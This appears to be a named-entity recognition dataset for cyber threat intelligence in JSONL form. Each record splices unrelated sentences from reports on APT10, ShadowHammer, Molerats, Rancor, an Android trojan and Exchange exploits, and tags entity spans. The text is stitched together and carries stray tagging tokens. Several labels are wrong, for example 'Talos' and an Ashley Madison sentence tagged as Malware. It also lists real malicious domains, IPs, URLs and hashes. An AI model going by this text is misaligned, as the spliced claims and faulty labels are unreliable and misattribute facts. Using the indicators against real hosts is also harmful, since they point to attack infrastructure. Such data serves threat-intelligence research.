{"text": "Design In the manifest , the malware requests a large number of permissions . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting . The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : \u201c ASUSTeK Computer Inc. \u201d ) . Each data item fills its location by calling function so , it will become like the following but with the victim collected data .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 141, "end": 153, "label": "Organization"}, {"start": 472, "end": 525, "label": "Malware"}]}
{"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers . Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 249, "end": 271, "label": "Indicator"}, {"start": 276, "end": 297, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 353, "end": 359, "label": "System"}]}
{"text": "To perform some of its activities , the malware does not need high privileges inside the device , as we will explain ahead . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 125, "end": 131, "label": "Organization"}, {"start": 136, "end": 147, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 307, "end": 311, "label": "Organization"}, {"start": 462, "end": 478, "label": "Vulnerability"}, {"start": 483, "end": 499, "label": "Vulnerability"}, {"start": 549, "end": 575, "label": "System"}]}
{"text": "Permissions in the manifest This malware is designed to avoid detection and analysis . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims . Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 115, "end": 143, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 411, "end": 421, "label": "Organization"}]}
{"text": "It has several protections in place , both in the C2 and the malware 's code . An additional campaign has also been observed targeting Japanese entities . The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": [{"start": 227, "end": 236, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 443, "end": 536, "label": "Indicator"}]}
{"text": "The code is not only obfuscated but also packed . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue . BARIUM is an APT actor known to be using the Winnti backdoor . Its wellknown that ransomware can be delivered via unremediated vulnerabilities , but many security teams are overwhelmed by the sheer number they are facing .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 149, "end": 162, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 338, "end": 344, "label": "Organization"}, {"start": 383, "end": 398, "label": "Malware"}, {"start": 420, "end": 430, "label": "Malware"}]}
{"text": "The packer , besides making the static analysis more complex , will break the standard debugger . The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 . Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 102, "end": 114, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 365, "end": 369, "label": "Organization"}, {"start": 419, "end": 425, "label": "Organization"}, {"start": 498, "end": 516, "label": "System"}, {"start": 644, "end": 668, "label": "System"}, {"start": 673, "end": 736, "label": "Indicator"}, {"start": 768, "end": 788, "label": "Organization"}]}
{"text": "Manifest activity declaration Class list inside the dex file The main malware classes are packed , to a point where the class defined in the manifest has a handler for the MAIN category that does not exist in the DEX file . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 . It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world . The U.S. government is taking additional measures to fight against ransomware attacks through methods such as hacking cybercriminals back .", "spans": [{"start": 224, "end": 229, "label": "Organization"}, {"start": 232, "end": 246, "label": "Organization"}, {"start": 262, "end": 283, "label": "Organization"}, {"start": 289, "end": 296, "label": "Organization"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 447, "end": 462, "label": "Organization"}]}
{"text": "Error when trying to debug the malware using the Android Studio IDE . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base . In principle , the distribution of victims should match the distribution of ASUS users around the world . The UK has already sanctioned the GRU after their appalling actions in Salisbury , and has frozen more than \u00a3 940 billion worth of bank assets and \u00a3 117 billion in personal net worth from oligarchs and their family members who fund Putin \u2019s war machine .", "spans": [{"start": 49, "end": 67, "label": "System"}, {"start": 94, "end": 116, "label": "Organization"}, {"start": 121, "end": 132, "label": "Organization"}, {"start": 226, "end": 249, "label": "Organization"}, {"start": 392, "end": 395, "label": "Organization"}]}
{"text": "One of the side effects of this packer is the inability of Android Studio IDE to debug the code . Moafee may have chosen its targets based on the rich resources of South China Sea region \u2013 the world 's second business sea-lane , according to Wikipedia \u2013 including rare earth metals , crude oil , and natural gas . We\u2019ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack . Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 98, "end": 104, "label": "Organization"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 308, "end": 311, "label": "Organization"}]}
{"text": "This happens because the IDE executes the code from the Android debug bridge ( ADB ) by calling the activity declared in the manifest by name . DragonOK appears to operate out of China 's Jiangsu Province . To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": [{"start": 56, "end": 76, "label": "System"}, {"start": 144, "end": 152, "label": "Organization"}, {"start": 355, "end": 367, "label": "Malware"}, {"start": 393, "end": 415, "label": "Malware"}]}
{"text": "Since the class does not exist at startup , the application does not run on the debugger . Moafee and DragonOK both use a well-known proxy tool \u2013 HUC Packet Transmit Tool ( HTRAN ) \u2013 to disguise their geographical locations . Download an archive with the tool ( .exe ) . 8.15 Logging & 8.16 Monitoring activities \u2013 determining the system information to log , store and query allows malicious behavior to be uncovered , if threat intelligence is applied to understand how threats may manifest themselves within log data .", "spans": [{"start": 91, "end": 97, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 146, "end": 170, "label": "System"}, {"start": 173, "end": 178, "label": "System"}, {"start": 262, "end": 266, "label": "Indicator"}, {"start": 510, "end": 518, "label": "Vulnerability"}]}
{"text": "Although Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups . Also , you may check MAC addresses online . StrifeWater is used to create a foothold in victim and environments , and it has various functions , including executing system commands , screen capturing , establishing persistence , listing system files , and downloading updates and additional modules .", "spans": [{"start": 9, "end": 14, "label": "Malware"}, {"start": 124, "end": 131, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 294, "end": 305, "label": "Malware"}]}
{"text": "Check code for emulators As part of its defense , the malware payload first checks for emulators to prevent analysis on sandboxes . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim . If you discover that you have been targeted by this operation , please e-mail us at : shadowhammer@kaspersky.com . Instead , it \u2019s likely that Royal is simply testing a new encryptor \u2014 especially considering that BlackSuit was used in just two attacks last month \u2014 and that this lull can be explained as more or less of a research period for them .", "spans": [{"start": 137, "end": 143, "label": "Organization"}, {"start": 148, "end": 156, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 398, "end": 403, "label": "Malware"}, {"start": 424, "end": 437, "label": "System"}, {"start": 468, "end": 477, "label": "Malware"}]}
{"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . Kaspersky Lab verdicts for the malware used in this and related attacks . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 55, "end": 59, "label": "System"}, {"start": 62, "end": 72, "label": "System"}, {"start": 75, "end": 85, "label": "System"}, {"start": 90, "end": 96, "label": "System"}, {"start": 99, "end": 110, "label": "Malware"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 364, "end": 376, "label": "Organization"}, {"start": 454, "end": 479, "label": "System"}]}
{"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers \u2013 all operated on CHINANET , and hosted in Guangdong Province . ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen . The first step is the previously unknown OWA exploit technique .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 314, "label": "Malware"}, {"start": 317, "end": 346, "label": "Malware"}]}
{"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province . ShadowHammer : asushotfix.com . We expect KillNet and its affiliates to continue conducting distributed denial - of - service ( DDoS ) and hack - and - leak operations intended to disrupt government and critical infrastructure functions in countries providing financial , economic , diplomatic or military support to Ukraine .", "spans": [{"start": 41, "end": 51, "label": "System"}, {"start": 74, "end": 81, "label": "System"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 186, "end": 191, "label": "System"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 312, "end": 326, "label": "Indicator"}, {"start": 339, "end": 346, "label": "Organization"}]}
{"text": "This helps the C2 define what actions it can do before being detected on the mobile device . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . ShadowHammer : 141.105.71.116 . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 114, "end": 125, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 281, "end": 293, "label": "Organization"}, {"start": 296, "end": 310, "label": "Indicator"}, {"start": 325, "end": 341, "label": "Vulnerability"}, {"start": 365, "end": 368, "label": "Organization"}, {"start": 375, "end": 389, "label": "Vulnerability"}]}
{"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip . The size of the industry has been expanding in the US and globally , with significant revenue increases making it an appealing target for ransoms .", "spans": [{"start": 172, "end": 181, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 233, "end": 241, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 312, "end": 324, "label": "Organization"}, {"start": 327, "end": 419, "label": "Indicator"}]}
{"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip . Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": [{"start": 20, "end": 41, "label": "System"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 279, "end": 373, "label": "Indicator"}, {"start": 417, "end": 432, "label": "System"}]}
{"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 285, "end": 379, "label": "Indicator"}]}
{"text": "For example , when a button is clicked , a view is focused , etc . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip . Umbrella , Cisco \u2019s secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs and URLs , whether users are on or off the corporate network .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 128, "end": 151, "label": "Organization"}, {"start": 174, "end": 186, "label": "Organization"}, {"start": 189, "end": 283, "label": "Indicator"}, {"start": 286, "end": 294, "label": "System"}, {"start": 297, "end": 337, "label": "System"}]}
{"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East . ShadowHammer : Liveupdate_Test_VER365.zip . In the UK , education has suffered a significant drop in funding in the last decade , according to the non - partisan Education Policy Institute .", "spans": [{"start": 163, "end": 180, "label": "System"}, {"start": 246, "end": 255, "label": "System"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 340, "end": 352, "label": "Organization"}, {"start": 355, "end": 381, "label": "Indicator"}, {"start": 502, "end": 528, "label": "Organization"}]}
{"text": "There is a function called \" performGlobalAction '' with the description below . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China \u2014 so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China . ShadowHammer : aa15eb28292321b586c27d8401703494 . In a recent survey , respondents indicated that 57 of all observed vulnerabilities are more than two years old , with as many as 17 being more than five years old .", "spans": [{"start": 89, "end": 94, "label": "Organization"}, {"start": 109, "end": 119, "label": "System"}, {"start": 122, "end": 126, "label": "System"}, {"start": 133, "end": 136, "label": "System"}, {"start": 167, "end": 180, "label": "Organization"}, {"start": 208, "end": 212, "label": "System"}, {"start": 291, "end": 303, "label": "Organization"}, {"start": 306, "end": 338, "label": "Indicator"}, {"start": 399, "end": 423, "label": "Vulnerability"}]}
{"text": "Android documentation describes that function as \" a global action . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia . The ransom note is also used to generate a message in the form of the background wallpaper typically located at \u201c C:/Users / Public / bg.jpg \u201d .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 367, "end": 382, "label": "Malware"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 558, "end": 609, "label": "Indicator"}]}
{"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal . In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia E-LOC throughout 2017 and 2018 . The session takeovers bypassed password and multi - factor authentication .", "spans": [{"start": 154, "end": 158, "label": "System"}, {"start": 232, "end": 245, "label": "Organization"}, {"start": 343, "end": 346, "label": "System"}, {"start": 384, "end": 391, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}]}
{"text": "For example , going back , going home , opening recents , etc . We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers . In recent attacks , the group has persistently targeted at least one government organization in Cambodia B-LOC E-IDTY from December 2018 through January 2019 . These victims are not criminals or terrorists , but instead , they are associated with activism .", "spans": [{"start": 177, "end": 181, "label": "System"}, {"start": 208, "end": 227, "label": "System"}, {"start": 230, "end": 233, "label": "System"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 353, "end": 379, "label": "Organization"}, {"start": 531, "end": 539, "label": "Organization"}]}
{"text": "'' The trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . While researching these attacks , we discovered an undocumented , custom malware family \u2013 which we \u2019ve named Dudell . Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 215, "end": 224, "label": "Malware"}, {"start": 252, "end": 271, "label": "Malware"}, {"start": 449, "end": 455, "label": "Malware"}, {"start": 458, "end": 469, "label": "Organization"}]}
{"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net . In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 211, "end": 219, "label": "System"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 240, "end": 264, "label": "System"}, {"start": 287, "end": 314, "label": "System"}, {"start": 317, "end": 320, "label": "System"}, {"start": 325, "end": 335, "label": "System"}, {"start": 338, "end": 347, "label": "System"}, {"start": 350, "end": 359, "label": "System"}, {"start": 362, "end": 371, "label": "System"}, {"start": 376, "end": 383, "label": "System"}, {"start": 430, "end": 437, "label": "Malware"}, {"start": 558, "end": 563, "label": "Organization"}, {"start": 628, "end": 636, "label": "Malware"}, {"start": 655, "end": 697, "label": "Vulnerability"}]}
{"text": "The beaconing only starts after the application is installed and removed from the running tasks . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 . Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware S-MALon S-MALvictim systems . Ashley Madison \u2019s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison \u2019s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": [{"start": 98, "end": 106, "label": "System"}, {"start": 255, "end": 261, "label": "Organization"}, {"start": 379, "end": 393, "label": "Organization"}, {"start": 531, "end": 545, "label": "Organization"}, {"start": 590, "end": 607, "label": "Organization"}, {"start": 643, "end": 727, "label": "Malware"}]}
{"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 . LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": [{"start": 134, "end": 142, "label": "Organization"}, {"start": 149, "end": 163, "label": "Organization"}, {"start": 170, "end": 181, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 284, "end": 297, "label": "Indicator"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 327, "end": 332, "label": "Malware"}, {"start": 353, "end": 371, "label": "Indicator"}, {"start": 375, "end": 395, "label": "Indicator"}, {"start": 399, "end": 401, "label": "System"}, {"start": 404, "end": 413, "label": "System"}]}
{"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC . DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 147, "end": 161, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 236, "end": 242, "label": "Malware"}, {"start": 254, "end": 318, "label": "Indicator"}, {"start": 509, "end": 517, "label": "Organization"}]}
{"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . DUDELL : File Type :M icrosoft Excel 97 \u2013 I-TOO 2 E-IDTY003 Document . By monitoring for indicators of compromise , organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks in earlier stages .", "spans": [{"start": 33, "end": 58, "label": "Indicator"}, {"start": 92, "end": 100, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}, {"start": 288, "end": 308, "label": "System"}]}
{"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq . DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls . p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7", "spans": [{"start": 260, "end": 266, "label": "Malware"}, {"start": 279, "end": 327, "label": "Indicator"}, {"start": 330, "end": 380, "label": "Malware"}]}
{"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed . The United States and countries in Europe are targeted as well . The DUDELL sample is a weaponized Microsoft Excel B-IDTY I-TOOL document that contains a malicious macro E-TOOL that runs on the victim \u2019s machine . Subscribing to the Talos weekly newsletter provides information about the most prevalent malware .", "spans": [{"start": 176, "end": 182, "label": "Malware"}, {"start": 206, "end": 215, "label": "System"}, {"start": 261, "end": 270, "label": "System"}, {"start": 271, "end": 283, "label": "System"}, {"start": 340, "end": 345, "label": "Organization"}]}
{"text": "List of available commands The command names are self-explanatory . The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 . It shares the same malicious behavior reported by Checkpoint in Rancor : The Year of The Phish E-MAL SHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de . There are two types of logs identified that can be useful in identifying historical evidence of session hijacking after the successful exploitation of CVE-2023 - 4966 .", "spans": [{"start": 198, "end": 208, "label": "Organization"}, {"start": 212, "end": 218, "label": "Organization"}, {"start": 221, "end": 236, "label": "Malware"}, {"start": 255, "end": 295, "label": "Indicator"}, {"start": 449, "end": 464, "label": "Vulnerability"}]}
{"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer . The MuddyWater attacks are primarily against Middle Eastern nations . In Check Point \u2019s blog , the sample is from December 2018 while this sample is from April 2018 . What is Cisco doing to take action against the growth of commercial spyware ?", "spans": [{"start": 102, "end": 133, "label": "Indicator"}, {"start": 369, "end": 380, "label": "Organization"}, {"start": 471, "end": 476, "label": "Organization"}]}
{"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA . The macro in this document gets executed when the user views the document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document \u2019s properties . All downloaders attempt to download an image file from a URL .", "spans": [{"start": 43, "end": 58, "label": "Indicator"}, {"start": 229, "end": 234, "label": "System"}, {"start": 346, "end": 351, "label": "System"}, {"start": 446, "end": 506, "label": "Indicator"}]}
{"text": "Base85 encoding is usually used on pdf and postscript documentsThe configuration of the malware is stored in custom preferences files , using the same obfuscation scheme . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers . The C2 server 199.247.6.253 is known to be used by the Rancor group . The first path ( /Library / Fonts / ArialUnicode.ttf.md5 ) stores the backdoor \u2019s full configuration , including its C2 servers .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 209, "end": 221, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 307, "end": 325, "label": "Organization"}, {"start": 328, "end": 350, "label": "Organization"}, {"start": 353, "end": 364, "label": "Organization"}, {"start": 367, "end": 386, "label": "Organization"}, {"start": 393, "end": 395, "label": "System"}, {"start": 403, "end": 416, "label": "Indicator"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 459, "end": 586, "label": "Malware"}]}
{"text": "Activation cycle As we have explained above , the malware has several defence mechanisms . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . The script is downloading a second stage payload via the Microsoft tool msiexec . YARA Rules", "spans": [{"start": 95, "end": 121, "label": "Organization"}, {"start": 169, "end": 184, "label": "Malware"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 285, "end": 297, "label": "Organization"}, {"start": 357, "end": 366, "label": "Organization"}, {"start": 372, "end": 379, "label": "System"}]}
{"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox mechanisms . MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" . Unfortunately at the time of discovery , the hosted file is unavailable . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 185, "end": 222, "label": "System"}, {"start": 233, "end": 243, "label": "System"}]}
{"text": "After installation , the user needs to run the application . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 . Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available . The code is obfuscated , using an obfuscator script , based on the fact that some comments the actor did n\u2019t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax .", "spans": [{"start": 280, "end": 284, "label": "Organization"}, {"start": 336, "end": 343, "label": "Indicator"}, {"start": 405, "end": 423, "label": "Malware"}, {"start": 426, "end": 452, "label": "Malware"}]}
{"text": "The user needs to press the \" close '' button to finish the installation . FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . Pivoting off the filename and directory , we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble . To say ransomware gangs have been unkind to the US in the past year is an understatement .", "spans": [{"start": 75, "end": 79, "label": "Organization"}, {"start": 85, "end": 103, "label": "Organization"}, {"start": 154, "end": 164, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 180, "end": 197, "label": "Organization"}, {"start": 289, "end": 295, "label": "Organization"}, {"start": 357, "end": 364, "label": "Indicator"}, {"start": 389, "end": 405, "label": "Organization"}]}
{"text": "However , this wo n't close the application , it will send it to the background , instead . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" . File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 154, "end": 158, "label": "Organization"}, {"start": 215, "end": 228, "label": "System"}, {"start": 236, "end": 251, "label": "System"}, {"start": 254, "end": 266, "label": "System"}, {"start": 276, "end": 286, "label": "Indicator"}, {"start": 298, "end": 362, "label": "Indicator"}, {"start": 448, "end": 464, "label": "Vulnerability"}, {"start": 539, "end": 555, "label": "Vulnerability"}]}
